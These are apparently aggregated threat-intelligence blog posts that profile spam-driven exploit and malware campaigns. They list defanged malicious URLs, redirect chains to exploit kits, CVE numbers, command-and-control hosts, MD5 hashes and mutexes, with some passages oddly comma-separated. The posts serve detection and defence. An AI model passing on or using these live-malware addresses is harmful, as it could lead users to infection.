hxxp://downloads.fileserversd.org
hxxp://downloads.portodrive.org
hxxp://downloads.fileserversj.org
hxxp://downloads.fileserversk.org
hxxp://downloads.fileserversm.org
hxxp://downloads.fileserversn.org
hxxp://downloads.fileserverso.org
hxxp://downloads.fileserversq.org
hxxp://downloads.fileserversr.org
hxxp://auth.facebook.com.megavids.org
hxxp://auth.facebook.com.fileserversl.com
hxxp://auth.facebook.com.legomay.com
hxxp://auth.facebook.com.crymyway.com
hxxp://auth.facebook.com.portodrive.net
hxxp://auth.facebook.com.modavedis.net
hxxp://auth.facebook.com.migpix.net
hxxp://auth.facebook.com.legomay.net
hxxp://auth.facebook.com.crymyway.net
hxxp://downloads.megavids.org
hxxp://downloads.regzavids.org
hxxp://downloads.vedivids.org
hxxp://downloads.restpictures.org
hxxp://downloads.modavedis.org
hxxp://downloads.fileserverst.org
hxxp://downloads.fileserversu.org
hxxp://downloads.regzapix.org
hxxp://downloads.reggiepix.org
hxxp://downloads.migpix.org
hxxp://downloads.restopix.org
hxxp://downloads.legomay.org
hxxp://downloads.vediway.org
hxxp://downloads.compoway.org
hxxp://downloads.restway.org
hxxp://downloads.crymyway.org
hxxp://downloads.fileserversa.com
hxxp://downloads.fileserversb.com
hxxp://downloads.fileserversc.com
hxxp://downloads.fileserversd.com
hxxp://downloads.fileserverse.com
hxxp://downloads.fileserversf.com
hxxp://downloads.fileserversg.com
hxxp://downloads.fileserversh.com
hxxp://downloads.fileserversi.com
hxxp://downloads.fileserversj.com
hxxp://downloads.fileserversk.com
hxxp://downloads.fileserversl.com
hxxp://downloads.fileserversm.com
hxxp://downloads.fileserversn.com
hxxp://downloads.fileserverso.com
hxxp://downloads.fileserversp.com
hxxp://downloads.fileserversq.com
hxxp://downloads.fileserversr.com
hxxp://downloads.regzavids.com
hxxp://downloads.vedivids.com
hxxp://downloads.restpictures.com
hxxp://downloads.modavedis.com
hxxp://downloads.fileserverss.com
hxxp://downloads.fileserverst.com
hxxp://downloads.fileserversu.com
hxxp://downloads.regzapix.com
hxxp://downloads.reggiepix.com
hxxp://downloads.migpix.com
hxxp://downloads.legomay.com
hxxp://downloads.vediway.com
hxxp://downloads.compoway.com
hxxp://downloads.crymyway.com
hxxp://downloads.fileserversa.net
hxxp://downloads.fileserversb.net
hxxp://downloads.fileserversc.net
hxxp://downloads.fileserversd.net
hxxp://downloads.fileserverse.net
hxxp://downloads.portodrive.net
hxxp://downloads.fileserversf.net
hxxp://downloads.fileserversg.net
hxxp://downloads.fileserversh.net
hxxp://downloads.fileserversi.net
hxxp://downloads.fileserversj.net
hxxp://downloads.fileserversk.net
hxxp://downloads.fileserversl.net
hxxp://downloads.fileserversm.net
hxxp://downloads.fileserversn.net
hxxp://downloads.fileserverso.net
hxxp://downloads.fileserversp.net
hxxp://downloads.fileserversq.net
hxxp://downloads.fileserversr.net
hxxp://downloads.regzavids.net
hxxp://downloads.vedivids.net
hxxp://downloads.tastyfiles.net
hxxp://downloads.restpictures.net
hxxp://downloads.modavedis.net
hxxp://downloads.fileserverss.net
hxxp://downloads.fileserverst.net
hxxp://downloads.fileserversu.net
hxxp://downloads.regzapix.net
hxxp://downloads.reggiepix.net
hxxp://downloads.migpix.net
hxxp://downloads.legomay.net
hxxp://downloads.vediway.net
hxxp://downloads.compoway.net
hxxp://downloads.restway.net
hxxp://downloads.crymyway.net

We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, developments, take, place. Continue reading →

Historical OSINT - Spamvertised Client-Side Exploits Serving Adult Content Themed Campaign

There's no such thing as free porn, unless there are client-side, exploits, served.

We've, recently, intercepted, a, currently, circulating, malicious, spam, campaign, enticing, end, users, into, clicking, on, malware-serving, client-side, exploits, embedded, content, for, the, purpose, of, affecting, a, socially, engineered, user''s, host, further, monetizing, access, by, participating, in, a, rogue, affiliate-network, based, type, of, monetizing, scheme.

In, this, post, we'll, profile, the, campaign, provide, actionable, intelligence, on, the, infrastructure, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, cybercriminals, behind, it.

Sample, malicious, URL, known, to, have, participated, in, the, campaign:
hxxp://jfkweb.chez.com/HytucztXRs.html? -> hxxp://aboutg.dothome.co.kr/bbs/theme_1_1_1.php -> http://aboutg.dothome.co.kr/bbs/theme_1_1_1.php?s=hvqCgoLEI&id=6 -> http://aboutg.dothome.co.kr/bbs/theme_1_1_1.php?s=hvqCgoLEI&id=14 -> hxxp://meganxoxo.com - 74.222.13.2 - associated, name, servers: ns1.tube310.info; ns2.tube310.info - 74.222.13.24

Parked there (74.222.13.2) are also:
hxxp://e-leaderz.com - Email: seoproinc@gmail.com
hxxp://babes4you.info - 74.222.13.25
hxxp://tubexxxx.info
hxxp://my-daddy.info - 74.222.13.25

Related, malicious, URLs, known, to, have, participated, in, the, campaign:
hxxp://eroticahaeven.info
hxxp://freehotbabes.info
hxxp://freepornportal.info
hxxp://hot-babez.info
hxxp://sex-sexo.info
hxxp://tube310.info
hxxp://tube323.info

The exploitation structure is as follows:
hxxp://meganxoxo.com/xox/go.php?sid=6 -> hxxp://kibristkd.org.tr/hasan-ikizer/index01.php -> hxxp://fd1a234sa.com/js - 79.135.152.26 -> hxxp://asf356ydc.com/qual/index.php - CVE-2008-2992; CVE-2009-0927; CVE-2010-0886 -> hxxp://asf356ydc.com/qual/52472f502b9688d3326a32ed5ddd5d2c.js ->  hxxp://asf356ydc.com/qual/abe9c321312b206bffa798ef9d5b6a9b.php?uid=206369 -> hxxp://188.243.231.39/public/qual.jar ->  hxxp://asf356ydc.com/qual/load.php/0a3584217553d6fccbd74cfb73e954b6?forum=thread_id -> hxxp://asf356ydc.com/download/stat.php -> hxxp://asf356ydc.com/download/load/load.exe

Related, malicious, URLs, known, to, have, participated, in, the, campaign:
hxxp://jfkweb.chez.com/frank4.html - CVE-2010-0886
    - hxxp://jfkweb.chez.com/bud2.html
        - hxxp://jfkweb.chez.com/4.html
            - hxxp://wemhkr3t4z.com/qual/load/myexebr.exe
                - hxxp://asf356ydc.com/download/index.php
                    - hxxp://89.248.111.71/qual/load.php?forum=jxp&ql
                        - hxxp://asf356ydc.com/qual/index.php

Related, malicious, URls, known, to, have, participated, in, the, campaign:
hxxp://qual/10964108e3afab081ed1986cde437202.js
hxxp://qual/768a83ea36dbd09f995a97c99780d63e.php?spn=2&uid=213393&
hxxp://qual/index.php?browser_version=6.0&uid=213393&browser=MSIE&spn=2

Related, malicious, URLs, known, to, have, participated, in, the, campaign:
hxxp://download/banner.php?spl=javat
hxxp://download/j1_ke.jar
hxxp://download/j2_93.jar

parked on 89.248.111.71, AS45001, Interdominios_ono Grupo Interdominios S.A.
wemhkr3t4z.com - Email: fole@fox.net - MD5: 3b375fc53207e1f54504d4b038d9fe6b

Related, malicious, MD5s, known, to, have, participated, in, the, campaign:
hxxp://alhatester.com/cp/file.exe - 204.11.56.48; 204.11.56.45; 8.5.1.46; 208.73.211.230; 208.73.211.247; 208.73.211.249; 208.73.211.246; 208.73.211.233; 208.73.211.238; 208.73.211.208

Known, to, have, phoned, back, to, the, same, malicious, C&C, server, IPs, are, also, the, following, malicious, MD5s:
MD5: 89fb419120d1443e86d37190c8f42ae8
MD5: 3194e6282b2e51ed4ef186ce6125ed73
MD5: 7f42da8b0f8542a55e5560e86c4df407
MD5: f8bdc841214ae680a755b2654995895e
MD5: ed8062e152ccbe14541d50210f035299

Once, executed, a, sample, malware (MD5: 89fb419120d1443e86d37190c8f42ae8), phones, back, to, the, following, C&C, server, IPs:
hxxp://gremser.eu
hxxp://bibliotecacenamec.org.ve
hxxp://fbpeintures.com
hxxp://postgil.com
hxxp://verum1.home.pl
hxxp://przedwislocze.internetdsl.pl
hxxp://iskurders.webkursu.net
hxxp://pennthaicafe.com.au
hxxp://motherengineering.com
hxxp://krupoonsak.com

Once, executed, a, sample, malware (MD5: 3194e6282b2e51ed4ef186ce6125ed73), phones, back, to, the, following, malicious, C&C, server, IPs:
hxxp://get.enomenalco.club
hxxp://promos-back.peerdlgo.info
hxxp://get.cdzhugashvili.bid
hxxp://doap.ctagonallygran.bid
hxxp://get.gunnightmar.club
hxxp://huh.adowableunco.bid
hxxp://slibby.ineddramatiseo.bid

Once, executed, a, sample, malware (MD5: 7f42da8b0f8542a55e5560e86c4df407), phones, back, to, the, following, malicious, C&C, server, IPs:
hxxp://acemoglusucuklari.com.tr
hxxp://a-bring.com
hxxp://tn69abi.com
hxxp://gim8.pl
hxxp://sso.anbtr.com

Once, executed, a, sample, malware (MD5: f8bdc841214ae680a755b2654995895e), phones, back, to, the, following, malicious, C&C, server, IPs:
hxxp://dtrack.secdls.com
hxxp://api.v2.secdls.com
hxxp://api.v2.sslsecure1.com
hxxp://api.v2.sslsecure2.com
hxxp://api.v2.sslsecure3.com
hxxp://api.v2.sslsecure4.com
hxxp://api.v2.sslsecure5.com
hxxp://api.v2.sslsecure6.com
hxxp://api.v2.sslsecure7.com
hxxp://api.v2.sslsecure8.com

Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C&C, server, IPs:
hxxp://v00d00.org/nod32/grabber.exe - - 67.215.238.77; 67.215.255.139; 184.168.221.87

Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, C&C, server, IPs (67.215.238.77):
MD5: 1233c86d3ab0081b69977dbc92f238d0

Known, to, have, responded, to, the, same, malicious, IPs, are, also, the, following, malicious, domains:
hxxp://blog.symantecservice37.com
hxxp://agoogle.in
hxxp://adv.antivirup.com
hxxp://cdind.antivirup.com

Once, executed, a, sample, malware, phones, back, to, the, following, C&C, server, IPs:
hxxp://v00d00.org/nod32/update.php

Known, to, have, responded, to, the, same, malicious, IPs (67.215.255.139), are, also, the, following, malicious, domains:
hxxp://lenovoserve.trickip.net
hxxp://proxy.wikaba.com
hxxp://think.jkub.com
hxxp://upgrate.freeddns.com
hxxp://webproxy.sendsmtp.com
hxxp://yote.dellyou.com
hxxp://lostself.dyndns.info
hxxp://dellyou.com
hxxp://mtftp.freetcp.com
hxxp://ftp.adobe.acmetoy.com
hxxp://timeout.myvnc.com
hxxp://fashion.servehalflife.com

Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C&C, server, IPs (67.215.255.139):
MD5: e76aa56b5ba3474dda78bf31ebf1e6c0
MD5: 4de5540e450e3e18a057f95d20e3d6f6
MD5: 346a605c60557e22bf3f29a61df7cd21
MD5: ae9fefda2c6d39bc1cec36cdf6c1e6c4
MD5: da84f1d6c021b55b25ead22aae79f599

Known, to, have, responded, to, the, same, malicious, C&C, server, IPs (184.168.221.87), are, also, the, following, malicious, domains:
hxxp://teltrucking.com
hxxp://capecoraldining.org
hxxp://carsforsaletoronto.com
hxxp://joeyboca.com
hxxp://meeraamacids.com
hxxp://orangepotus.com
hxxp://palmerhardware.com
hxxp://railroadtohell.com

Related, malicious, MD5s, known, to, have, phoned, back, the, same, malicious, C&C, server, IPs (184.168.221.87):MD5: 037f8120323f2ddff3c806185512538c
MD5: 44f0e8fe53a3b489cb5204701fa1773d
MD5: 8a053e8d3e2eafc27be9738674d4d5b0
MD5: 9efc79cd75d23070735da219c331fe4d
MD5: ed81b9f1b72e31df1040ccaf9ed4393f

Once, executed, a, sample, malware (MD5: 037f8120323f2ddff3c806185512538c), phones, back, to, the, following, C&C, server, IPs:
hxxp://porno-kuba.net/emo/ld.php?v=1&rs=1819847107&n=1&uid=1

Once, executed, a, sample, malware, (MD5: 44f0e8fe53a3b489cb5204701fa1773d), phones, back, to, the, following, C&C, server, IPs:
hxxp://mhc.ir
hxxp://naphooclub.com
hxxp://mdesigner.ir
hxxp://nazarcafe.com
hxxp://meandlove.com
hxxp://nakhonsawangames.com
hxxp://mevlanacicek.com
hxxp://meeraprabhu.com
hxxp://micr.ae
hxxp://myhyderabadads.com
hxxp://cup-muangsuang.net

Sample, malicious, URLs, known, to, have, participated, in, the, campaign:
hxxp://portinilwo.com/nhjq/n09230945.asp
    - hxxp://portinilwo.com/botpanel/sell2.jpg
        - hxxp://portinilwo.com/boty.dat
            - hxxp://91.188.60.161/botpanel/sell2.jpg
                - hxxp://91.188.60.161/botpanel/ip.php

Once, executed, a, sample, malware, phones, back, to, the, following, C&C, server, IPs:
asf356ydc.com - MD5: 3b375fc53207e1f54504d4b038d9fe6b

Related, malicious, domains, known, to, have, participated, in, the, campaign:
asf356ydc.co
kaljv63s.com
sadkajt357.com

We'll, continue, monitoring, the, fraudulent, infrastructure, and, post, updates, as, soon, as, new, developments, take, place. Continue reading →

Malicious Client-Side Exploits Serving Campaign Intercepted, Thousands of Users Affected

We've recently intercepted, a currently, circulating, malicious campaign, utilizing, a variety, of compromised, Web sites, for, the purpose, of serving, malicious software, to socially engineered, users.

In this post, we'll profile, the campaign, the infrastructure, behind, it, provide, actionable, intelligence, MD5s, and, discuss, in depth, the tactics, techniques, and procedures, of, the cybercrimnals, behind it.

Sample malicious URL:
hxxp://directbalancejs.com/module.so - 37.48.116.208; 31.31.204.161

hxxp://2-eco.ru
hxxp://2401.ru
hxxp://24xxx.site
hxxp://3502050.ru
hxxp://6553009.xyz
hxxp://7032949.ru
hxxp://academing.ru
hxxp://academyfinance.ru
hxxp://activelifelab.com
hxxp://advokat-mikheev.ru
hxxp://advokatstav.ru
hxxp://akvahim98.ru
hxxp://al-minbar.ru
hxxp://allesmarket.com
hxxp://alltrump.ru
hxxp://altropasso.ru
hxxp://ambertao.info
hxxp://ambertao.org
hxxp://ancra.ru
hxxp://andr-6-update.ru
hxxp://android-new.ru
hxxp://androidid-6-new.ru
hxxp://angrymultik.ru
hxxp://animaciyafoto.ru
hxxp://animaciyaonline.ru
hxxp://animaciyastiker.ru
hxxp://animationline.ru
hxxp://animehvost.ru
hxxp://anyen.ru
hxxp://anywifi.online
hxxp://apple-pro.moscow
hxxp://appliancerepairmonster.com
hxxp://aptechka.farm
hxxp://arbosfera.ru
hxxp://archsalut.ru
hxxp://arstd.ru
hxxp://aslanumarov.ru
hxxp://atlanted.ru
hxxp://aurispc.ru
hxxp://avangardmaster.ru
hxxp://aviacorp24.ru
hxxp://awpashko.com

Known to have phoned back to the same malicious C&C server (31.31.204.161) are also the following malicious MDSs:
MD5: c3754018dab05b3b8aac5fe8100076ce

Once executed the sample phones back to the following C&C server:
hxxp://info-get.ru - 31.31.204.161

Known to have phoned back to the same malicious C&C server (31.31.204.161) are also the following malicious MD5s:
MD5: 4ff9bd7a045b0fe42a8f633428a59732
MD5: 46b1eaae5b53668a7ac958aecf4e57c3
MD5: d643025c5d0a2a2940502f4b15ca1801
MD5: 75dce2d84540153107024576bfce08fc
MD5: a23235ed940a75f997c127f59b09011d

This post has been reproduced from Dancho Danchev's blog. Continue reading →

Malicious Script Artifacts at China Green Dot Gov Dot Cn - A Reminiscence of Asprox's Multi-Tasking Activities

Malware artifacts, abandoned mass iframe embedded/injected campaigns, and low Quality Assurance (QA) campaigns, continue popping up on everyone's radar, raising eyebrows as to the extend of incompetence, possible evasive tactics, plain simple lack of applied QA when maintaining these campaigns, or the end of a campaign's life cycle.

What's the value of assessing such a non-active campaign? Can the analysis provide any clues into related currently active malicious campaigns that typically for such type of campaigns, continue relying on the same malicious infrastructure? But of course.

Let's assess the malicious artifacts at hxxp://chinagreen.gov.cn, connect them to the multi-tasking activities conducted on behalf of the Asprox botnet, as well as several spamvertised malware campaigns circa 2010, and most importantly provide actionable intelligence on currently active campaigns that continue using the very same infrastructure for command and control purposes.

Malicious scripts at China Green Dot Gov Dot CN:
update.webserviceftp.ru/js.js - seen in "Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign"
gdi.webserviceftp.ru/js.js - seen in "Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign"
ver.webserivcekota.ru/js.js - seen in "Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign"
batch.webserviceaan.ru/js.js - seen in "Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign"
nemohuildiin.ru/tds/go.php?sid=1 - seen in "Dissecting the Xerox WorkCentre Pro Scanned Document Themed Campaign"
parkperson.ru:8080/index.php?pid=13 - seen in "Spamvertised Best Buy, Macy's, Evite and Target Themed Scareware/Exploits Serving Campaign"
nutcountry.ru:8080/index.php?pid=13 - seen in "Spamvertised Best Buy, Macy's, Evite and Target Themed Scareware/Exploits Serving Campaign"

What's so special about the spamvertised XeroxWorkCentre Pro campaign is that, back in 2010, it used to drop an Asprox sample, naturally phoning back to well known Asprox C&Cs at the time.

nemohuildiin.ru is known to have responded to 31.31.204.61 and most recently to 5.63.152.19

Known to have responded to the same IP (31.31.204.61) are also the following malicious domains:
000sstd.com
02143.ru
03111991.ru
0414.ru
0424.ru
050175.ru
054ru.ru
06140.ru
0664346910.ru
0801.ru
08108.ru
087474.ru
08755.ru
0925.ru
0go.ru
1-androds.ru
10000taxi.ru
1001domains.ru
100yss.ru
124k.ru

Moreover, we also got a decent number of malicious MD5s known to have used the same IP as C&C ove the last couple of months, indicating that the artifact is still part of the C&C infrastructure of active campaigns.

The following malicious MD5s are also known to have phoned back to the same IP over the last couple of months:
MD5: 3e3d249c43950ac8bedb937f1ea347f5
MD5: 398b5f0c4b8f9adb1db8420801b52562
MD5: 9a1602a2693ae510339ef5f0d25be0b3
MD5: 9bc423773de47d95de1718173ec8485f
MD5: 637db36286b3e300c37e99a0b4772548
MD5: 9829c64613909fbb13fc402f23baff1b
MD5: f23562bafd94f7b836633f1fb7f9e18f
MD5: 7d263c93829447b2399c2e981d66c9df
MD5: 6ee37ead84906711cb2eed6d7f2fcc88
MD5: 54eb099176e7d65817d1b9789845ee4e
MD5: 723618efbd0d3627da09a770e5fd28c2
MD5: 151030c819209af9b7b2ecf2f5c31aa0
MD5: 279d390b9116f0f8ac80321e5fa43453
MD5: f78ff547ce388a403f5ba979025cd556
MD5: afa7090479ac49a3547931fe249c52e3
MD5: a2565684ae4c0af5a99214da83664927
MD5: ce4f032a3e478f4d4cac959b2e999b5a

Known to have responded to 5.63.152.19 are also the following malicious domains:
6tn.ru
azosi.ru
bi-news.ru
buygroup.ru
dnpsirius.ru
enterplus.ru
nemohuildiin.ru
nfs-worlds.ru
rassylka-na-doski.ru
santehnikaoptom.ru
v-odnoklassniki.ru

In a cybercrime ecosystem dominated by leaked DIY mass Web site hacking tools, and sophisticated iframe-ing platforms, malicious artifacts are a great reminder that as long as the Web site remains susceptible to remote exploitation, it's only a matter of time before a potential cybercriminal embeds/injects malicious script on it. That's cybercrime-friendly common sense.

Updates will be posted as soon as new developments take place. Continue reading →

Fake Pinterest 'Don't forget to confirm your email!' Themed Emails Serve Client-side Exploits and Malware

Cybercriminals have just launched yet another massive spam campaign, this time attempting to trick Pinterest users into thinking that they've received an email confirmation request. In reality though, once users click on the links found in the malicious emails, they're automatically exposed to client-side exploits, with the campaign dropping two malware samples on the affected hosts once a successful client-side exploitation takes place.

Let's dissect the campaign, expose the malicious portfolio of domains involved in it, provide MD5s of the served malware as well as a sample exploit, and provide actionable (historical) intelligence regarding related malicious activities that have been taking place using same infrastructure that's involved in the Pinterest campaign.

Spamvertised malicious URL: 
boxenteam.com/hathaway/index.html?emailmpss/PSEUDO_RANDOM_CHARACTERS

Attempts to load the following malicious scripts:
theodoxos.gr/hairstyles/defiling.js
web29.webbox11.server-home.org/volleyballs/cloture.js
knopflos-combo.de/subdued/opposition.js

Sample client-side exploits serving URL:
pizzapluswindsor.ca/topic/latest-blog-news.php

Malicious domain name reconnaissance:
pizzapluswindsor.ca - 50.116.6.57; 174.140.169.145

Responding to the same IP (50.116.6.57) are also the following malicious domains part of the campaing's infrastructure:
pizzapluswindsor.ca
plainidea.com
procreature.com
poindextersonpatrol.com
pixieglitztutus.com

Known to have responded to the second IP (174.140.169.145) are also the following malicious domains:
lesperancerenovations.com
louievozza.com
louvozza.com
lv-contracting.com
lvconcordecontracting.com
mcbelectrical.ca
oliviagurun.com
onecable.ca
onlyidea.com
originalpizzaplus.ca
originalpizzaplus.com
papak.ca
pccreature.com
pixieglitztutus.com
pizzapluswindsor.ca
saltlakecityutahcommercialrealestate.com

The following malicious MD5s are known to have phoned back to the same IP on the 22nd of September, 2013:
MD5: 5d14ee5800fc3c73e4d40567044c4149
MD5: bdc2ac48921914f25d1a3a164266cebc
MD5: a0b2ba75ba7ad7ad5a5b87a966fddb07
MD5: 31c3eae608247c2901d64643d5626b1f
MD5: 3cff9bba085254f2a524207a1388b015
MD5: b59743a3b128c9676548510627db4ac5
MD5: 53004bb63d32792c9bc1b8b26db0f197
MD5: b59743a3b128c9676548510627db4ac5
MD5: 53004bb63d32792c9bc1b8b26db0f197
MD5: 94e7cf26589baac1d47d6834e6375a62
MD5: 38461b4537fb269b2142e7fbac16375b
MD5: 041e9ccce8809371b07f0ac1c4d02b33
MD5: 868cf2c7af8863aebbaeb42c1b404b36
MD5: 7ec71f392dfc98336808ca6e31f25969
MD5: 6792b758ea961f58ad5b2f1eb96a648a
MD5: 33550cef428cad48ba776ea109fe1936
MD5: af84138bc55192ce722582def2f05200
MD5: 170524f3457d1fa681cc5dafbcc86199
MD5: e3af059e42b82b8658f3d05043a5a213
MD5: 4724783ae2c928b40dd2c0ac6d85cbc4
MD5: 9b8d87230ee7f553e8a9011a37ca699e
MD5: e4d63169ddac5e34fe000dc21c88682f
MD5: 5f777af07c79369310dff97d04c026cd
MD5: 200badc2e35ce57f1e511aea7322e207
MD5: 93fe170f26d99aea52b30b74afdf96bc
MD5: d06a0cc046e99496ada5591d9f457fc1
MD5: 6f857be5377a7543858aacefea6f1a30
MD5: 92ed463b3c38f2c951c3acd78e7a2df3
MD5: 8f01cd5ddd6e599e79ddcefbff9c0891

Detection rate for a sample served exploit from the Pinterest themed campaign: 
MD5: d49275523cae83a5e7639bb22604dd86 - detected by 5 out of 48 antivirus scanners as HEUR:Exploit.Java.CVE-2012-1723.gen

Upon successful client-side exploitation, the campaign drops two malware samples on the affected hosts.

Detection rate for the first dropped sample: 
MD5: ae840d6ac2f02b4bff85182d2c72a053 - detected by 6 out of 48 antivirus scanners as UDS:DangerousObject.Multi.Generic

Once executed, it phones back to the following C&C:
78.140.131.151/uploading/id=REDACTED&u=PSEUDO_RANDOM_CHARACTERS

The following malicious MD5s are also known to have phoned back to the following C&C IP (78.140.131.151) in the past:
MD5: ca783e0964e7dcb91fcc2a2ff4b8058f
MD5: d02b0e60f94d718fca19893f13dbd93e
MD5: 3618032d05c12e6d25aa4b7bc9086e06
MD5: 20777b8e6362f8775060fc4fdb191978
MD5: 5a1fb639f5dd97b62b5cf79c84d479f6
MD5: 30f8d972566930c103f9edb7f9bd699e
MD5: 7011abeefd5c9e7c21e3cbe28cc5e71a
MD5: bbb57f1a5004b6adc016c0c9e92add19
MD5: cca6b7fae6678c4b17f21b2ed4580404
MD5: 0decc3f58519c587949dff871fccba5e
MD5: 1b18f9138adbd6b4bf7125c7e6a97aae
MD5: 1e4451c19f07ef6bde87ffbcecc5afb3
MD5: e92297e402fcd03f06c94fe52985a3e9
MD5: 818e329757630bccc9536151f533fad2
MD5: 79e8677f857531118e61fa9238287acb
MD5: de8ef966e7e5251b642540e715d673a6
MD5: 9be83dc4b829ffba26029b173b36237d
MD5: c9b3f7888faa393ee14815494a311684
MD5: d90058b75b8730f9d6bf94a845b3dfda
MD5: e14b4290eec92ce6cd3e0349c17bc062
MD5: 6d5f5419f6a116f4283ae58516ff90a1
MD5: d0587b6e83a70798077e2938af66c50c
MD5: 12449febf7efed7bceade5720c8f635d
MD5: 992fc7370b39553ebcb3c03c23c15517
MD5: 1c198a6b80b1dcf280db30133c26d479
MD5: 7bb85f458b6b8a0bc98d47447b44c5b6
MD5: 1a3679c0c7c42781d9ee5b6987efa726
MD5: 7d21915fc425b3545c8e156116f91e00

Detection rate for the second dropped sample:
MD5: 83bbe52c8584a5dab07a11ecc5aaf090 - detected by 3 out of 48 antivirus scanners as Trojan-Spy.Win32.Zbot.qgje; Trojan.Backdoor.RV

Once executed it starts listening on ports 7867 and 1653.

The sample then creates the following Mutexes on the affected hosts:
Local\{B0B9FAFD-CA9C-4B54-DBC9-BE58FA349D4A}
Local\{B0B9FAFC-CA9D-4B54-DBC9-BE58FA349D4A}
Local\{D15F4CEE-7C8F-2AB2-DBC9-BE58FA349D4A}
Local\{D15F4CE9-7C88-2AB2-DBC9-BE58FA349D4A}
Local\{0BB5ADEF-9D8E-F058-DBC9-BE58FA349D4A}
Local\{911F9FCD-AFAC-6AF2-DBC9-BE58FA349D4A}
Global\{2E06BA86-8AE7-D5EB-DBC9-BE58FA349D4A}
Global\{B0B9FAFD-CA9C-4B54-DBC9-BE58FA349D4A}
Global\{B0B9FAFC-CA9D-4B54-DBC9-BE58FA349D4A}
Global\{D15F4CEE-7C8F-2AB2-DBC9-BE58FA349D4A}
Global\{D15F4CE9-7C88-2AB2-DBC9-BE58FA349D4A}
Global\{0BB5ADEF-9D8E-F058-DBC9-BE58FA349D4A}
Global\{BB67AFC4-9FA5-408A-DBC9-BE58FA349D4A}
Global\{EFF344E9-7488-141E-11EB-B06D3016937F}
Global\{EFF344E9-7488-141E-75EA-B06D5417937F}
Global\{EFF344E9-7488-141E-4DE9-B06D6C14937F}
Global\{EFF344E9-7488-141E-65E9-B06D4414937F}
Global\{EFF344E9-7488-141E-89E9-B06DA814937F}
Global\{EFF344E9-7488-141E-BDE9-B06D9C14937F}
Global\{EFF344E9-7488-141E-51E8-B06D7015937F}
Global\{EFF344E9-7488-141E-81E8-B06DA015937F}
Global\{EFF344E9-7488-141E-FDE8-B06DDC15937F}
Global\{EFF344E9-7488-141E-0DEF-B06D2C12937F}
Global\{EFF344E9-7488-141E-5DEF-B06D7C12937F}
Global\{EFF344E9-7488-141E-95EE-B06DB413937F}
Global\{EFF344E9-7488-141E-F1EE-B06DD013937F}
Global\{EFF344E9-7488-141E-89EB-B06DA816937F}
Global\{EFF344E9-7488-141E-F9EF-B06DD812937F}
Global\{EFF344E9-7488-141E-E5EF-B06DC412937F}
Global\{EFF344E9-7488-141E-0DEE-B06D2C13937F}
Global\{EFF344E9-7488-141E-09ED-B06D2810937F}
Global\{EFF344E9-7488-141E-51EF-B06D7012937F}
Global\{EFF344E9-7488-141E-35EC-B06D1411937F}
Global\{EFF344E9-7488-141E-55EF-B06D7412937F}
Global\{DDB39BDC-ABBD-265E-DBC9-BE58FA349D4A}
Global\{2E1C200D-106C-D5F1-DBC9-BE58FA349D4A}
MPSWabDataAccessMutex
MPSWABOlkStoreNotifyMutex

Once executed, it also drops MD5: 2da7bbc5677313c2876b571b39edc7cf and MD5: 83bbe52c8584a5dab07a11ecc5aaf090 on the affected hosts.

It then phones back to the following C&C (command and control servers):
99.157.164.179
174.76.94.24
99.60.68.114
217.35.75.232
184.145.205.63
99.60.111.51
207.47.212.146
108.240.232.212
107.193.222.108

We've already seen (some of) these C&C IPs in the following profiled malicious campaign "Spamvertised Facebook 'You have friend suggestions, friend requests and photo tags' Themed Emails Lead to Client-side Exploits and Malware".

Updates will be posted as soon as new developments take place. Continue reading →

Spamvertised Facebook 'You have friend suggestions, friend requests and photo tags' Themed Emails Lead to Client-side Exploits and Malware

A currently circulating malicious 'Facebook notifications" themed spam campaign, attempts to trick Facebook's users into thinking that they've received a notifications digest for the activity that (presumably) took place while they were logged out of Facebook. In reality though, once users click on any of the links found in the malicious email, they're automatically exposed to client-side exploits ultimately dropping malware on their hosts.

Let's dissect the campaign, provide actionable intelligence on the campaign's structure, the involved portfolio of malicious domains, actual/related MD5s, and as always, connect the currently ongoing campaign with two other previously profiled malicious campaigns.

Spamvertised URL:
hxxp://user4634.vs.easily.co.uk/darkened/PSEUDO_RANDOM_CHARACTERS

Attempts to load the following malicious scripts:
hxxp://3dbrandscapes.com/starker/manipulator.js
hxxp://distrigold.eu/compounding/melisa.js
hxxp://ly-ra.com/shallot/mandalay.js

Client-side exploits serving URL:
hxxp://directgrid.org/topic/lairtg-nilles-slliks.php

Malicious domain name reconnaissance:
directgrid.org - 50.116.10.71 - Email: ringfields@islandresearch.net

Responding to the following IP (50.116.10.71) are also the following malicious domains participating in the campaign:
directgrid.biz
directgrid.com
directgrid.info
directgrid.net
directgrid.org
directgrid.us
gilkjones.com
integra-inspection.ca
integra-inspection.co
integra-inspection.info
taxipunjab.com
taxisamritsar.com
watttrack.com

The following malicious MD5s are known to have been downloaded -- related campaigns -- from the same IP (50.116.10.71):
MD5: 7eb6740ed6935da49614d95a43146dea
MD5: 7768f7039988236165cdd5879934cc5d

The following malicious MD5s are known to have 'phoned back' to the same IP (50.116.10.71) over the past 24 hours:
MD5: a0065f7649db9a885acd34301ae863b0
MD5: 5503573f4fe15b211956f67c66e18d02
MD5: 01d757b672673df8032abbaa8acf3e22
MD5: 7ad68895e5ec9d4f53fc9958c70df01a
MD5: fd99250ecb845a455499db8df1780807
MD5: fd99250ecb845a455499db8df1780807
MD5: 3983170d46a130f23471340a47888c93
MD5: c86c79d9fee925a690a4b0307d7f2329
MD5: 25f498f7823f12294c685e9bc79376d2
MD5: 470f4aa3f76ea3b465741a73ce6c22fe
MD5: 43b78852a7363d8a4cf7538d4e68c887
MD5: e3aae430ed4036b19f26fa2ed9bbe2bf
MD5: e782619301a0a0a843cedc5d02c563b5
MD5: fc16335d0e1827b271b031309634dc0f
MD5: a55e21b0231d0508cb638892b6ee8ec5
MD5: 053c84c12900b81506eb884ec9f930c9
MD5: e03d0dd786b038c570dc53690db0673b
MD5: 086b16af34857cb5dfb0163cc1c92569
MD5: e066b50bae491587574603bdfd60826e
MD5: eb22137880f8c5a03c73135f288afb8a
MD5: b88392fb63747668c982b6321e5ce712
MD5: 6254d901b1566bef94e673f833adff8c
MD5: 258d640b802a0bbe08471f4f064cb94a
MD5: c1cefb742107516c3a73489eae176745
